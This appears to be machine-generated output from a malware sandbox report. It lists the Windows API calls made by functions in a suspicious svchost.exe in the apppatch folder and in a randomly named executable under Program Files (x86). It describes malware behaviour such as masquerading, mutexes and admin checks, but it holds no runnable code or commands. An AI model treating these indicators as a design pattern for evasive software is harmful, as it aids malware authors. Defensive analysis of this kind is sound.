Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,2_2_02C844F0
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,2_2_02C90BE0
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,2_2_02C92320
Source: C:\Windows\apppatch\svchost.exeCode function: GetUserNameA,memset,InitializeCriticalSection,StrStrIA,2_2_02C89860
Source: C:\Windows\apppatch\svchost.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,2_2_02C8B810
Source: C:\Windows\apppatch\svchost.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,2_2_02C911C0
Source: C:\Windows\apppatch\svchost.exeCode function: CreateThread,StrStrIA,GetHandleInformation,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,CreateThread,wsprintfA,wsprintfA,wsprintfA,CreateThread,wsprintfA,2_2_02C7C9F0
Source: C:\Windows\apppatch\svchost.exeCode function: memset,VirtualQuery,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,2_2_02C71180
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,StrStrIA,2_2_02C91150
Source: C:\Windows\apppatch\svchost.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,2_2_02C71670
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,2_2_02C8FFE0
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,2_2_02C8FDC0
Source: C:\Windows\apppatch\svchost.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,2_2_02C92590
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA,CreateMutexA,GetLastError,2_2_02C73510
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,6_2_01255890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetModuleFileNameA,StrStrIA,6_2_01261150
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,6_2_01241180
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: CreateThread,StrStrIA,GetHandleInformation,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,CreateThread,wsprintfA,wsprintfA,wsprintfA,CreateThread,wsprintfA,6_2_0124C9F0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,6_2_012611C0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,6_2_01247020
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,6_2_0125B810
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetUserNameA,memset,InitializeCriticalSection,StrStrIA,6_2_01259860
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,6_2_01262320
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,6_2_01260BE0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError,6_2_01243510
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,6_2_01262590
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,6_2_0125FDC0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,6_2_012544F0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,6_2_0125FFE0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,6_2_01241670
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,7_2_01055890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetModuleFileNameA,StrStrIA,7_2_01061150
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,7_2_01041180
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,7_2_010611C0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: CreateThread,StrStrIA,GetHandleInformation,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,CreateThread,wsprintfA,wsprintfA,wsprintfA,CreateThread,wsprintfA,7_2_0104C9F0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,7_2_0105B810
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,7_2_01047020
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetUserNameA,memset,InitializeCriticalSection,StrStrIA,7_2_01059860
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,7_2_01062320
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,7_2_01060BE0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError,7_2_01043510
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,7_2_01062590
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,7_2_0105FDC0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,7_2_010544F0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,7_2_0105FFE0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,7_2_01041670
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,9_2_00A35890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,9_2_00A27020
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,9_2_00A3B810
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetUserNameA,memset,InitializeCriticalSection,StrStrIA,9_2_00A39860
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,9_2_00A21180
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: CreateThread,StrStrIA,GetHandleInformation,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,CreateThread,wsprintfA,wsprintfA,wsprintfA,CreateThread,wsprintfA,9_2_00A2C9F0
